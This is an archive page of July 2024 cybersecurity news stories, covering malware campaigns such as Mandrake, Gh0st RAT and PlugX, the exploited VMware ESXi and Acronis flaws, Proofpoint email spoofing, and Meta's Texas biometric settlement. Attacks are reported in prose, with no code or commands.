H January(68) February(106) March(112) April(110) June(37) July(114) August(16) September(0) October(0) November(0) December(0)
Meta Settles for $1.4 Billion with Texas Over Illegal Biometric Data
Collection
31.7.24
Social The Hacker News
Meta, the parent company of Facebook, Instagram, and WhatsApp, agreed to a
record $1.4 billion settlement with the U.S. state of Texas over allegations
that it illegally collected biometric data of millions of users without their
permission, marking one of the largest penalties levied by regulators against
the tech giant.
"This historic settlement demonstrates our commitment to standing up to the world's biggest technology companies and holding them accountable for breaking the law and violating Texans' privacy rights," Attorney General Ken Paxton said. "Any abuse of Texans' sensitive data will be met with the full force of the law."
The development arrived more than two years after the social media behemoth was sued for unlawfully capturing facial data belonging to Texas without their informed consent as is required by the law. The Menlo Park-based company, however, did not admit to any wrongdoing.
Tag Suggestions, as the feature was originally called when it was introduced in 2010, was marketed as a way for users to easily tag photos shared on Facebook with the names of people in them. However, it was enabled by default without giving adequate explanation as to how it worked.
The lawsuit accused Meta of violating the state's Capture or Use of Biometric Identifier (CUBI) Act and the Deceptive Trade Practices Act.
"Unbeknownst to most Texans, for more than a decade Meta ran facial recognition software on virtually every face contained in the photographs uploaded to Facebook, capturing records of the facial geometry of the people depicted," according to a press statement from the Attorney General's office.
"Meta did this despite knowing that CUBI forbids companies from capturing biometric identifiers of Texans, including records of face geometry, unless the business first informs the person and receives their consent to capture the biometric identifier."
In November 2021, Meta said it was discontinuing its "Face Recognition" system altogether and deleting a huge collection of more than a billion users' facial recognition templates as part of a wider initiative to limit the use of the technology across its products.
That same year, it agreed to pay a $650 million settlement in a 2015 class-action lawsuit in Illinois under the Biometric Information Privacy Act (BIPA) over similar allegations related to its face-tagging system.
Meta is not the only party being targeted by Texas over the collection of biometric data. The state also sued Google in October 2022 for allegedly violating the same biometric privacy law by gathering voice and facial data through products like Google Photos, Google Assistant, and Nest Hub Max. The case is currently underway.
New Mandrake Spyware Found in Google
Play Store Apps After Two Years
31.7.24
Virus The Hacker News
A new iteration of a sophisticated Android spyware called Mandrake has been
discovered in five applications that were available for download from the Google
Play Store and remained undetected for two years.
The applications attracted a total of more than 32,000 installations before being pulled from the app storefront, Kaspersky said in a Monday write-up. A majority of the downloads originated from Canada, Germany, Italy, Mexico, Spain, Peru, and the U.K.
"The new samples included new layers of obfuscation and evasion techniques, such as moving malicious functionality to obfuscated native libraries, using certificate pinning for C2 communications, and performing a wide array of tests to check if Mandrake was running on a rooted device or in an emulated environment," researchers Tatyana Shishkova and Igor Golovin said.
Mandrake was first documented by Romanian cybersecurity vendor Bitdefender in May 2020, describing its deliberate approach to infect a handful of devices while managing to lurk in the shadows since 2016. The malware has yet to be attributed to a threat actor or group.
Cybersecurity
The updated variants are characterized by the use of OLLVM to conceal the main
functionality, while also incorporating an array of sandbox evasion and anti-analysis
techniques to prevent the code from being executed in environments operated by
malware analysts.
The list of apps containing Mandrake is below -
AirFS (com.airft.ftrnsfr)
Amber (com.shrp.sght)
Astro Explorer (com.astro.dscvr)
Brain Matrix (com.brnmth.mtrx)
CryptoPulsing (com.cryptopulsing.browser)
The apps pack in three stages: A dropper that launches a loader responsible for
executing the core component of the malware after downloading and decrypting it
from a command-and-control (C2) server.
The second-stage payload is also capable of collecting information about the
device's connectivity status, installed applications, battery percentage,
external IP address, and current Google Play version. Furthermore, it can wipe
the core module and request for permissions to draw overlays and run in the
background.
The third-stage supports additional commands to load a specific URL in a WebView and initiate a remote screen sharing session as well as record the device screen with the goal of stealing victims' credentials and dropping more malware.
"Android 13 introduced the 'Restricted Settings' feature, which prohibits sideloaded applications from directly requesting dangerous permissions," the researchers said. "To bypass this feature, Mandrake processes the installation with a 'session-based' package installer."
The Russian security company described Mandrake as an example of a dynamically evolving threat that's constantly refining its tradecraft to bypass defense mechanisms and evade detection.
"This highlights the threat actors' formidable skills, and also that stricter controls for applications before being published in the markets only translate into more sophisticated, harder-to-detect threats sneaking into official app marketplaces," it said.
When reached for comment, Google told The Hacker News that it's continuously shoring up Google Play Protect defenses as new malicious apps are flagged and that it's enhancing its capabilities to include live threat detection to tackle obfuscation and anti-evasion techniques.
"Android users are automatically protected against known versions of this malware by Google Play Protect, which is on by default on Android devices with Google Play Services," a Google spokesperson said. "Google Play Protect can warn users or block apps known to exhibit malicious behavior, even when those apps come from sources outside of Play."
Cybercriminals Target Polish
Businesses with Agent Tesla and Formbook Malware
31.7.24
Virus The Hacker News
Cybersecurity researchers have detailed widespread phishing campaigns targeting
small and medium-sized businesses (SMBs) in Poland during May 2024 that led to
the deployment of several malware families like Agent Tesla, Formbook, and
Remcos RAT.
Some of the other regions targeted by the campaigns include Italy and Romania, according to cybersecurity firm ESET.
"Attackers used previously compromised email accounts and company servers, not only to spread malicious emails but also to host malware and collect stolen data," ESET researcher Jakub Kaloč said in a report published today.
Cybersecurity
These campaigns, spread across nine waves, are notable for the use of a malware
loader called DBatLoader (aka ModiLoader and NatsoLoader) to deliver the final
payloads.
This, the Slovakian cybersecurity company said, marks a departure from previous attacks observed in the second half of 2023 that leveraged a cryptors-as-a-service (CaaS) dubbed AceCryptor to propagate Remcos RAT (aka Rescoms).
"During the second half of [2023], Rescoms became the most prevalent malware family packed by AceCryptor," ESET noted in March 2024. "Over half of these attempts happened in Poland, followed by Serbia, Spain, Bulgaria, and Slovakia."
The starting point of the attacks was phishing emails incorporating malware-laced RAR or ISO attachments that, upon opening, activated a multi-step process to download and launch the trojan.
In cases where an ISO file was attached, it would directly lead to the execution
of DBatLoader. The RAR archive, on the other hand, contained an obfuscated
Windows batch script enclosing a Base64-encoded ModiLoader executable that's
disguised as a PEM-encoded certificate revocation list.
A Delphi-based downloader, DBatLoader is primarily designed to download and launch the next stage malware from either Microsoft OneDrive or compromised servers belonging to legitimate companies.
Regardless of what malware is deployed, Agent Tesla, Formbook, and Remcos RAT come with capabilities to siphon sensitive information, allowing the threat actors to "prepare the ground for their next campaigns."
The development comes as Kaspersky revealed that SMBs are being increasingly targeted by cybercriminals owing to their lack of robust cybersecurity measures as well as limited resources and expertise.
"Trojan attacks remain the most common cyberthreat, which indicates that attackers continue to target SMBs and favor malware over unwanted software," the Russian security vendor said last month.
"Trojans are particularly dangerous because they mimic legitimate software, which makes them harder to detect and prevent. Their versatility and ability to bypass traditional security measures make them a prevalent and effective tool for cyber attackers."
New SideWinder Cyber Attacks Target
Maritime Facilities in Multiple Countries
31.7.24
Cyber The Hacker News
The nation-state threat actor known as SideWinder has been attributed to a new
cyber espionage campaign targeting ports and maritime facilities in the Indian
Ocean and Mediterranean Sea.
The BlackBerry Research and Intelligence Team, which discovered the activity, said targets of the spear-phishing campaign include countries like Pakistan, Egypt, Sri Lanka, Bangladesh, Myanmar, Nepal, and the Maldives.
SideWinder, which is also known by the names APT-C-17, Baby Elephant, Hardcore Nationalist, Leafperforator, Rattlesnake, and Razor Tiger, is assessed to be affiliated with India. It has been operational since 2012, often making use of spear-phishing as a vector to deliver malicious payloads that trigger the attack chains.
"SideWinder makes use of email spear-phishing, document exploitation and DLL side-loading techniques in an attempt to avoid detection and deliver targeted implants," the Canadian cybersecurity company said in an analysis published last week.
Cybersecurity
The latest set of attacks employ lures related to sexual harassment, employee
termination, and salary cuts in order to negatively impact the recipients'
emotional state and trick them into opening booby-trapped Microsoft Word
documents.
Once the decoy file is opened, it leverages a known security flaw (CVE-2017-0199) to establish contact with a malicious domain that masquerades as Pakistan's Directorate General Ports and Shipping ("reports.dgps-govtpk[.]com") to retrieve an RTF file.
The RTF document, in turn, downloads a document that exploits CVE-2017-11882,
another years-old security vulnerability in the Microsoft Office Equation
Editor, with the goal of executing shellcode that's responsible for launching
JavaScript code, but only after ensuring that the compromised system is
legitimate and is of interest to the threat actor.
It's currently not known what's delivered by means of the JavaScript malware, although the end goal is likely to be intelligence gathering based on prior campaigns mounted by SideWinder.
"The SideWinder threat actor continues to improve its infrastructure for targeting victims in new regions," BlackBerry said. "The steady evolution of its network infrastructure and delivery payloads suggests that SideWinder will continue its attacks in the foreseeable future."
The disclosure comes as a suspected Russian-linked threat actor is targeting entities interested in Indian political affairs with a Go-based remote access trojan (RAT) that's delivered via a .NET loader launched from Windows shortcut (LNK) files disguised as Office documents. The activity has been codenamed Operation ShadowCat.
OneDrive Phishing Scam Tricks Users
into Running Malicious PowerShell Script
31.7.24
Phishing The Hacker News
Cybersecurity researchers are warning about a new phishing campaign that targets
Microsoft OneDrive users with the aim of executing a malicious PowerShell script.
"This campaign heavily relies on social engineering tactics to deceive users into executing a PowerShell script, thereby compromising their systems," Trellix security researcher Rafael Pena said in a Monday analysis.
The cybersecurity company is tracking the "crafty" phishing and downloader campaign under the name OneDrive Pastejacking.
The attack unfolds via an email containing an HTML file that, when opened, displays an image simulating an OneDrive page and includes the error message that says: "Failed to connect to the 'OneDrive' cloud service. To fix the error, you need to update the DNS cache manually."
The message also comes with two options, namely "How to fix" and "Details," with the latter directing the email recipient to a legitimate Microsoft Learn page on Troubleshooting DNS.
However, clicking "How to fix" prompts the user to follow a series of steps, which includes pressing "Windows Key + X" to open the Quick Link menu, launching the PowerShell terminal, and pasting a Base64-encoded command to supposedly fix the issue.
Cybersecurity
"The command [...] first runs ipconfig /flushdns, then creates a folder on the
C: drive named 'downloads,'" Pena explained. "Subsequently, it downloads an
archive file into this location, renames it, extracts its contents ('script.a3x'
and 'AutoIt3.exe'), and executes script.a3x using AutoIt3.exe."
The campaign has been observed targeting users in the U.S., South Korea, Germany, India, Ireland, Italy, Norway, and the U.K.
The disclosure builds upon similar findings from ReliaQuest, Proofpoint, and McAfee Labs, indicating that phishing attacks employing this technique – also tracked as ClickFix – are becoming increasingly prevalent.
The development comes amid the discovery of a new email-based social engineering campaign distributing bogus Windows shortcut files that lead to the execution of malicious payloads hosted on Discord's Content Delivery Network (CDN) infrastructure.
Phishing campaigns have also been increasingly observed sending emails
containing links to Microsoft Office Forms from previously compromised
legitimate email accounts to entice targets into divulging their Microsoft 365
login credentials under the pretext of restoring their Outlook messages.
"Attackers create legitimate-looking forms on Microsoft Office Forms, embedding malicious links within the forms," Perception Point said. "These forms are then sent to targets en-masse via email under the guise of legitimate requests such as changing passwords or accessing important documents, mimicking trusted platforms and brands like Adobe or Microsoft SharePoint document viewer."
What's more, other attack waves have utilized invoice-themed lures to trick victims to sharing their credentials on phishing pages hosted on Cloudflare R2 that are then exfiltrated to the threat actor via a Telegram bot.
It's no surprise that adversaries are constantly on the lookout for different ways to stealthily smuggle malware past Secure Email Gateways (SEGs) so as to increase the likelihood of success of their attacks.
According to a recent report from Cofense, bad actors are abusing how SEGs scan ZIP archive attachments to deliver the Formbook information stealer by means of DBatLoader (aka ModiLoader and NatsoLoader).
Specifically, this involves passing off the HTML payload as an MPEG file to evade detection by taking advantage of the fact that many common archive extractors and SEGs parse the file header information but ignore the file footer that may contain more accurate information about the file format.
"The threat actors utilized a .ZIP archive attachment and when the SEG scanned the file contents, the archive was detected as containing a .MPEG video file and was not blocked or filtered," the company noted.
"When this attachment was opened with common/popular archive extraction tools such as 7-Zip or Power ISO, it also appeared to contain a .MPEG video file, but it would not play. However, when the archive was opened in an Outlook client or via the Windows Explorer archive manager, the .MPEG file is (correctly) detected as being a .HTML [file]."
VMware ESXi Flaw Exploited by
Ransomware Groups for Admin Access
31.7.24
Ransom The Hacker News
A recently patched security flaw impacting VMware ESXi hypervisors has been
actively exploited by "several" ransomware groups to gain elevated permissions
and deploy file-encrypting malware.
The attacks involve the exploitation of CVE-2024-37085 (CVSS score: 6.8), an Active Directory integration authentication bypass that allows an attacker to obtain administrative access to the host.
"A malicious actor with sufficient Active Directory (AD) permissions can gain full access to an ESXi host that was previously configured to use AD for user management by re-creating the configured AD group ('ESXi Admins' by default) after it was deleted from AD," Broadcom-owned VMware noted in an advisory released in late June 2024.
In other words, escalating privileges on ESXi to the administrator was as simple as creating a new AD group named "ESX Admins" and adding any user to it, or renaming any group in the domain to "ESX Admins" and adding a user to the group or using an existing group member.
Microsoft, in a new analysis published on July 29, said it observed ransomware operators like Storm-0506, Storm-1175 (a China-based threat actor known for deploying Medusa ransomware), Octo Tempest, and Manatee Tempest leveraging the post-compromise technique to deploy Akira and Black Basta.
Cybersecurity
"VMware ESXi hypervisors joined to an Active Directory domain consider any
member of a domain group named 'ESX Admins' to have full administrative access
by default," researchers Danielle Kuznets Nohi, Edan Zwick, Meitar Pinto,
Charles-Edouard Bettan, and Vaibhav Deshmukh said.
"This group is not a built-in group in Active Directory and does not exist by default. ESXi hypervisors do not validate that such a group exists when the server is joined to a domain and still treats any members of a group with this name with full administrative access, even if the group did not originally exist."
In one attack staged by Storm-0506 against an unnamed engineering firm in North America, the threat actor weaponized the vulnerability to gain elevated permissions to the ESXi hypervisors after having obtained an initial foothold using a QakBot infection and exploiting another flaw in the Windows Common Log File System (CLFS) Driver (CVE-2023-28252, CVSS score: 7.8) for privilege escalation.
Subsequently, phases entailed the deployment of Cobalt Strike and Pypykatz, a Python version of Mimikatz, to steal domain administrator credentials and move laterally across the network, followed by dropping the SystemBC implant for persistence and abusing the ESXi admin access to deploy Black Basta.
"The actor was also observed attempting to brute force Remote Desktop Protocol (RDP) connections to multiple devices as another method for lateral movement, and then again installing Cobalt Strike and SystemBC," the researchers said. "The threat actor then tried to tamper with Microsoft Defender Antivirus using various tools to avoid detection."
"It's important to note that exploitation is very dependent on the host having
been configured to use AD for user management," Scott Caveza, staff research
engineer at Tenable, said in a statement. "In addition, an attacker would also
need privileged access to the AD environment in order to successfully exploit
this vulnerability."
"Despite this significant barrier to entry, we cannot underestimate ransomware groups' abilities and determination to escalate privileges and advance their attack path once they obtain initial access."
The development comes as Google-owned Mandiant revealed that a financially motivated threat cluster called UNC4393 is using initial access obtained via a C/C++ backdoor codenamed ZLoader (aka DELoader, Terdot, or Silent Night) to deliver Black Basta, moving away from QakBot and DarkGate.
"UNC4393 has demonstrated a willingness to cooperate with multiple distribution clusters to complete its actions on objectives," the threat intelligence firm said. "This most recent surge of Silent Night activity, beginning earlier this year, has been primarily delivered via malvertising. This marked a notable shift away from phishing as UNC4393's only known means of initial access."
The attack sequence involves making use of the initial access to drop Cobalt Strike Beacon and a combination of custom and readily-available tools to conduct reconnaissance, not to mention relying on RDP and Server Message Block (SMB) for lateral movement. Persistence is achieved by means of SystemBC.
ZLoader, which resurfaced after a long gap late last year, has been under active development, with new variants of the malware being propagated via a PowerShell backdoor referred to as PowerDash, per recent findings from Walmart's cyber intelligence team.
Over the past few years, ransomware actors have demonstrated an appetite for latching onto novel techniques to maximize impact and evade detection, increasingly targeting ESXi hypervisors and taking advantage of newly disclosed security flaws in internet-facing servers to breach targets of interest.
Qilin (aka Agenda), for instance, was originally developed in the Go programming language, but has since been redeveloped using Rust, indicating a shift towards constructing malware using memory-safe languages. Recent attacks involving ransomware have been found to leverage known weaknesses in Fortinet and Veeam Backup & Replication software for initial access.
"The Qilin ransomware is capable of self-propagation across a local network," Group-IB said in a recent analysis, adding it's also equipped to "carry out self-distribution using VMware vCenter."
Another notable malware employed in Qilin ransomware attacks is a tool dubbed Killer Ultra that's designed to disable popular endpoint detection and response (EDR) software running on the infected host as well as clear all Windows event logs to remove all indicators of compromise.
Organizations are recommended to install the latest software updates, practice credential hygiene, enforce two-factor authentication, and take steps to safeguard critical assets using appropriate monitoring procedures and backup and recovery plans.
Critical Flaw in Acronis Cyber
Infrastructure Exploited in the Wild
31.7.24
Vulnerebility The Hacker News
Cybersecurity company Acronis is warning that a now-patched critical security
flaw impacting its Cyber Infrastructure (ACI) product has been exploited in the
wild.
The vulnerability, tracked as CVE-2023-45249 (CVSS score: 9.8), concerns a case of remote code execution that stems from the use of default passwords.
The flaw impacts the following versions of Acronis Cyber Infrastructure (ACI) -
<
build 5.0.1-61
< build 5.1.1-71
< build 5.2.1-69
< build 5.3.1-53, and
< build 5.4.4-132
It has been addressed in versions 5.4 update 4.2, 5.2 update 1.3, 5.3 update
1.3, 5.0 update 1.4, and 5.1 update 1.2 released in late October 2023.
Cybersecurity
There are currently no details on how the vulnerability is being weaponized in
real-world cyber attacks and the identity of the threat actors that may be
exploiting it.
However, the Swiss-headquartered company acknowledged reports of active exploitation in an updated advisory last week. "This vulnerability is known to be exploited in the wild," it said.
Users of affected versions of ACI are recommended to update to the latest version to mitigate potential threats.
Update#
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added
CVE-2023-45249 to its Known Exploited Vulnerabilities (KEV) catalog, requiring
Federal Civilian Executive Branch (FCEB) agencies to remediate the flaw by
August 19, 2024.
Acronis shared the below statement with The Hacker News following the publication of the story -
The CISA added CVE-2023-45249 to the list of known exploited vulnerabilities. Acronis identified the vulnerability nine months ago, and a security patch was released immediately. Customers running the older version of Acronis Cyber Infrastructure impacted by the vulnerability were promptly informed, provided a patch and recommended upgrading to the new version. Acronis Cyber Protect Cloud, Acronis Cyber Protect and Acronis True Image customers were not affected by the vulnerability
Proofpoint Email Routing Flaw
Exploited to Send Millions of Spoofed Phishing Emails
29.7.24
Exploit The Hacker News
An unknown threat actor has been linked to a massive scam campaign that
exploited an email routing misconfiguration in email security vendor Proofpoint's
defenses to send millions of messages spoofing various popular companies like
Best Buy, IBM, Nike, and Walt Disney, among others.
"These emails echoed from official Proofpoint email relays with authenticated SPF and DKIM signatures, thus bypassing major security protections — all to deceive recipients and steal funds and credit card details," Guardio Labs researcher Nati Tal said in a detailed report shared with The Hacker News.
The cybersecurity company has given the campaign the name EchoSpoofing. The activity is believed to have commenced in January 2024, with the threat actor exploiting the loophole to send as many as three million emails per day on average, a number that hit a peak of 14 million in early June as Proofpoint began to enact countermeasures.
"The most unique and powerful part of this domain is the spoofing method – leaving almost no chance to realize this is not a genuine email sent from those companies," Tal told the publication.
"This EchoSpoofing concept is really powerful. It's kind of strange it is being used for large-scale phishing like this instead of a boutique spear-phishing campaign – where an attacker can swiftly take any real company team member's identity and send emails to other co-workers – eventually, through high-quality social engineering, get access to internal data or credentials and even compromise the entire company.
The technique, which involves the threat actor sending the messages from an SMTP server on a virtual private server (VPS), is notable for the fact that it complies with authentication and security measures such as SPF and DKIM, which are short for Sender Policy Framework and DomainKeys Identified Mail, respectively, and refer to authentication methods that are designed to prevent attackers from imitating a legitimate domain.
Cybersecurity
It all goes back to the fact that these messages are routed from various
adversary-controlled Microsoft 365 tenants, which are then relayed through
Proofpoint enterprise customers' email infrastructures to reach users of free
email providers such as Yahoo!, Gmail, and GMX.
This is the result of what Guardio described as a "super-permissive misconfiguration flaw" in Proofpoint servers ("pphosted.com") that essentially allowed spammers to take advantage of the email infrastructure to send the messages.
"The root cause is a modifiable email routing configuration feature on Proofpoint servers to allow relay of organizations' outbound messages from Microsoft 365 tenants, but without specifying which M365 tenants to allow," Proofpoint said in a coordinated disclosure report shared with The Hacker News.
"Any email infrastructure that offers this email routing configuration feature can be abused by spammers."
Put differently, an attacker can weaponize the shortcoming to set up rogue
Microsoft 365 tenants and deliver spoofed email messages to Proofpoint's relay
servers, from where they are "echoed back" as genuine digital missives
impersonating the customers' domains.
This, in turn, is accomplished by configuring the Exchange Server's outgoing email connector directly to the vulnerable pphosted.com endpoint associated with the customer. Furthermore, a cracked version of a legitimate email delivery software called PowerMTA is used for sending the messages.
"The spammer used a rotating series of leased virtual private servers (VPS) from
several providers, using many different IP addresses to initiate quick bursts of
thousands of messages at a time from their SMTP servers, sent to Microsoft 365
to be relayed to Proofpoint-hosted customer servers," Proofpoint said.
"Microsoft 365 accepted these spoofed messages and sent them to these customers' email infrastructures to be relayed. When customer domains were spoofed while relaying through the matching customer's email infrastructure, DKIM signing was also applied as the messages transited through the Proofpoint infrastructure, making the spam messages more deliverable."
It's
being suspected that EchoSpoofing was intentionally chosen by the operators as a
way to generate illegal revenue as well as avoid the risk of exposure for
extended periods of time, as directly targeting the companies via this modus
operandi could have drastically increased the chances of getting detected,
effectively imperiling the entire scheme.
That having said, it's currently not clear who is behind the campaign. Proofpoint said the activity does not overlap with any known threat actor or group.
"In March, Proofpoint researchers identified spam campaigns being relayed through a small number of Proofpoint customers' email infrastructure by sending spam from Microsoft 365 tenants," it said in a statement. "All analyses indicate this activity was conducted by one spam actor, whose activity we do not attribute to a known entity."
"Since discovering this spam campaign, we have worked diligently to provide corrective instructions, including implementing a streamlined administrative interface for customers to specify which M365 tenants are allowed to relay, with all other M365 tenants denied by default."
Proofpoint emphasized that no customer data was exposed, nor did any of them experience loss of data, as a result of these campaigns. It further noted that it reached out to some of its customers directly to change their settings to stop the effectiveness of the outbound relay spam activity.
"As we started to block the spammer's activity, the spammer accelerated its testing and moved quickly to other customers," the company pointed out. "We established a continuous process of identifying the customers affected each day, re-prioritizing outreach to fix configurations."
To cut down on spam, it's urging VPS providers to limit their users' ability to send large volumes of messages from SMTP servers hosted on their infrastructure. It's also calling on email service providers to restrict the capabilities of free trial and newly created unverified tenants to send bulk outbound email messages as well as prevent them from sending messages that spoof a domain for which they do not have proven ownership.
"For CISOs, the main takeaway here is to take extra care of their organization's cloud posture – specifically with the use of 3rd party services that become the backbone of your company's networking and communication methods," Tal said. "Specifically in the realm of emails, always maintain a feedback loop and control of your own – even if you trust your email provider fully."
"And as for other companies providing this kind of backbone services – just like Proofpoint did, they must be vigilant and proactive in thinking of all possible types of threats in the first place. Not only threats that directly affect their customers but the wider public as well.
"This is crucial for the safety of all of us and companies that create and operate the backbone of the internet, even if privately held, have the highest responsibility on it. Just like one said, in a different context entirely yet so relevant here: 'With great powers, comes great responsibility.'"
'Stargazer Goblin' Creates 3,000 Fake GitHub Accounts for Malware Spread
29.7.24
Virus The Hacker News
A threat actor known as Stargazer Goblin has set up a network of inauthentic
GitHub accounts to fuel a Distribution-as-a-Service (DaaS) that propagates a
variety of information-stealing malware and netting them $100,000 in illicit
profits over the past year.
The network, which comprises over 3,000 accounts on the cloud-based code hosting platform, spans thousands of repositories that are used to share malicious links or malware, per Check Point, which has dubbed it "Stargazers Ghost Network."
Some of the malware families propagated using this method include Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine, with the bogus accounts also engaged in starring, forking, watching, and subscribing to malicious repositories to give them a veneer of legitimacy.
The network is believed to have been active since August 2022 in some preliminary form, although an advertisement for the DaaS wasn't spotted in the dark until early July 2023.
"Threat actors now operate a network of 'Ghost' accounts that distribute malware via malicious links on their repositories and encrypted archives as releases," security researcher Antonis Terefos explained in an analysis published last week.
"This network not only distributes malware but also provides various other activities that make these 'Ghost' accounts appear as normal users, lending fake legitimacy to their actions and the associated repositories."
Different categories of GitHub accounts are responsible for distinct aspects of the scheme in an attempt to make their infrastructure more resilient to takedown efforts by GitHub when malicious payloads are flagged on the platform.
Cybersecurity
These include accounts that serve the phishing repository template, accounts
providing the image for the phishing template, and accounts that push malware to
the repositories in the form of a password-protected archive masquerading as
cracked software and game cheats.
Should the third set of accounts be detected and banned by GitHub, Stargazer Goblin moves to update the first account's phishing repository with a new link to a new active malicious release, thereby allowing the operators to move forward with minimal disruption.
Besides liking new releases from multiple repositories and committing changes to the README.md files to modify the download links, there is evidence to suggest that some accounts part of the network have been previously compromised, with the credentials likely obtained via stealer malware.
"Most of the time, we observe that Repository and Stargazer accounts remain unaffected by bans and repository takedowns, whereas Commit and Release accounts are typically banned once their malicious repositories are detected," Terefos said.
"It's common to find Link-Repositories containing links to banned Release-Repositories. When this occurs, the Commit account associated with the Link-Repository updates the malicious link with a new one."
One of the campaigns discovered by Check Point involves the use of a malicious link to a GitHub repository that, in turn, points to a PHP script hosted on a WordPress site, which then delivers an HTML Application (HTA) file to ultimately execute Atlantida Stealer by means of a PowerShell script.
Other malware families propagated via the DaaS are Lumma Stealer, RedLine Stealer, Rhadamanthys, and RisePro. Check Point further noted that the GitHub accounts are part of a larger DaaS solution that operates similar 'Ghost' accounts on other platforms such as Discord, Facebook, Instagram, X, and YouTube.
"Stargazer Goblin created an extremely sophisticated malware distribution
operation that avoids detection as GitHub is considered a legitimate website,
bypasses suspicions of malicious activities, and minimizes and recovers any
damage when GitHub disrupts their network," Terefos said.
"Utilizing multiple accounts and profiles performing different activities from starring to hosting the repository, committing the phishing template, and hosting malicious releases, enables the Stargazers Ghost Network to minimize their losses when GitHub performs any actions to disturb their operations as usually only one part of the whole operation is disrupted instead of all the involved accounts."
The development comes as unknown threat actors are targeting GitHub repositories, wiping their contents, and asking the victims to reach out to a user named Gitloker on Telegram as part of a new extortion operation that has been ongoing since February 2024.
The social engineering attack targets developers with phishing emails sent from "notifications@github.com," aiming to trick them into clicking on bogus links under the guise of a job opportunity at GitHub, following which they are prompted to authorize a new OAuth app that erases all the repositories and demands a payment in exchange for restoring access.
It also follows an advisory from Truffle Security that it's possible to access sensitive data from deleted forks, deleted repositories, and even private repositories on GitHub, urging organizations to take steps to secure against what it's calling a Cross Fork Object Reference (CFOR) vulnerability.
"A CFOR vulnerability occurs when one repository fork can access sensitive data from another fork (including data from private and deleted forks)," Joe Leon said. "Similar to an Insecure Direct Object Reference, in CFOR users supply commit hashes to directly access commit data that otherwise would not be visible to them."
In other words, a piece of code committed to a public repository may be accessible forever as long as there exists at least one fork of that repository. On top of that, it could also be used to access code committed between the time an internal fork is created and the repository is made public.
It's however worth noting that these are intentional design decisions taken by GitHub, as noted by the company in its own documentation -
Commits to any repository in a fork network can be
accessed from any repository in the same fork network, including the upstream
repository
When you change a private repository to public, all the commits in that
repository, including any commits made in the repositories it was forked into,
will be visible to everyone.
"The average user views the separation of private and public repositories as a
security boundary, and understandably believes that any data located in a
private repository cannot be accessed by public users," Leon said.
"Unfortunately, [...] that is not always true. What's more, the act of deletion implies the destruction of data. As we saw above, deleting a repository or fork does not mean your commit data is actually deleted."
Gh0st RAT Trojan Targets Chinese Windows Users via Fake Chrome Site
29.7.24
Virus The Hacker News
The remote access trojan known as Gh0st RAT has been observed being delivered by
an "evasive dropper" called Gh0stGambit as part of a drive-by download scheme
targeting Chinese-speaking Windows users.
These infections stem from a fake website ("chrome-web[.]com") serving malicious installer packages masquerading as Google's Chrome browser, indicating that users searching for the software on the web are being singled out.
Gh0st RAT is a long-standing malware that has been observed in the wild since 2008, manifesting in the form of different variants over the years in campaigns primarily orchestrated by China-nexus cyberespionage groups.
Some iterations of the trojan have also been previously deployed by infiltrating poorly-secured MS SQL server instances, using it as a conduit to install the Hidden open-source rootkit.
Cybersecurity
According to cybersecurity firm eSentire, which discovered the latest activity,
the targeting of Chinese-speaking users is based on "the use of Chinese-language
web lures and Chinese applications targeted for data theft and defense evasion
by the malware."
The MSI installer downloaded from the phony website contains two files, a legitimate Chrome setup executable and a malicious installer ("WindowsProgram.msi"), the latter of which is used to launch shellcode that's responsible for loading Gh0stGambit.
The dropper, in turn, checks for the presence of security software (e.g., 360 Safe Guard and Microsoft Defender Antivirus) before establishing contact with a command-and-control (C2) server in order to retrieve Gh0st RAT.
"Gh0st RAT is written in C++ and has many features, including terminating processes, removing files, capturing audio and screenshots, remote command execution, keylogging, data exfiltration, hiding registry, files, and directories via the rootkit capabilities, and many more," eSentire said.
It's also capable of dropping Mimikatz, enabling RDP on the compromised hosts, accessing account identifiers associated with Tencent QQ, clearing Windows event logs, and erasing data from 360 Secure Browser, QQ Browser, and Sogou Explorer.
The Canadian company said the artifact shares overlaps with a Gh0st RAT variant tracked by the AhnLab Security Intelligence Center (ASEC) under the moniker HiddenGh0st.
"Gh0st RAT has seen widespread use and modification by APT and criminal groups over the past several years," eSentire said. "The recent findings highlight the distribution of this threat via drive-by downloads, deceiving users into downloading a malicious Chrome installer from a deceptive website."
"The continued success of drive-by downloads reinforces the need for ongoing security training and awareness programs."
The development comes as Broadcom-owned Symantec said it observed an increase in phishing campaigns likely leveraging Large Language Models (LLMs) to generate malicious PowerShell and HTML code used to download several loaders and stealers.
The emails contained "code used to download various payloads, including Rhadamanthys, NetSupport RAT, CleanUpLoader (Broomstick, Oyster), ModiLoader (DBatLoader), LokiBot, and Dunihi (H-Worm)," security researchers Nguyen Hoang Giang and Yi Helen Zhang said. "Analysis of the scripts used to deliver malware in these attacks suggests they were generated using LLMs."
French Authorities Launch Operation to Remove PlugX Malware from Infected
Systems
28.7.24
BigBrothers The Hacker News
French judicial authorities, in collaboration with Europol, have launched a so-called
"disinfection operation" to rid compromised hosts of a known malware called
PlugX.
The Paris Prosecutor's Office, Parquet de Paris, said the initiative was launched on July 18 and that it's expected to continue for "several months."
It further said around a hundred victims located in France, Malta, Portugal, Croatia, Slovakia, and Austria have already benefited from the cleanup efforts.
The development comes nearly three months after French cybersecurity firm Sekoia disclosed it sinkhole a command-and-control (C2) server linked to the PlugX trojan in September 2023 by spending $7 to acquire the IP address. It also noted that nearly 100,000 unique public IP addresses have been sending PlugX requests daily to the seized domain.
PlugX (aka Korplug) is a remote access trojan (RAT) widely used by China-nexus threat actors since at least 2008, alongside other malware families like Gh0st RAT and ShadowPad.
The malware is typically launched within compromised hosts using DLL side-loading techniques, allowing threat actors to execute arbitrary commands, upload/download files, enumerate files, and harvest sensitive data.
"This backdoor, initially developed by Zhao Jibin (aka. WHG), evolved throughout the time in different variants," Sekoia said earlier this April. "The PlugX builder was shared between several intrusion sets, most of them attributed to front companies linked to the Chinese Ministry of State Security."
Over the years, it has also incorporated a wormable component that enables it to
be propagated via infected USB drives, effectively bypassing air-gapped networks.
Sekoia, which devised a solution to delete PlugX, said variants of the malware with the USB distribution mechanism come with a self-deletion command ("0x1005") to remove itself from the compromised workstations, although there is currently no way to remove it from the USB devices itself.
"Firstly, the worm has the capability to exist on air-gapped networks, which makes these infections beyond our reach," it said. "Secondly, and perhaps more noteworthy, the PlugX worm can reside on infected USB devices for an extended period without being connected to a workstation."
Given the legal complications involved in remotely wiping the malware off the systems, the company further noted that it's deferring the decision to national Computer Emergency Response Teams (CERTs), law enforcement agencies (LEAs), and cybersecurity authorities.
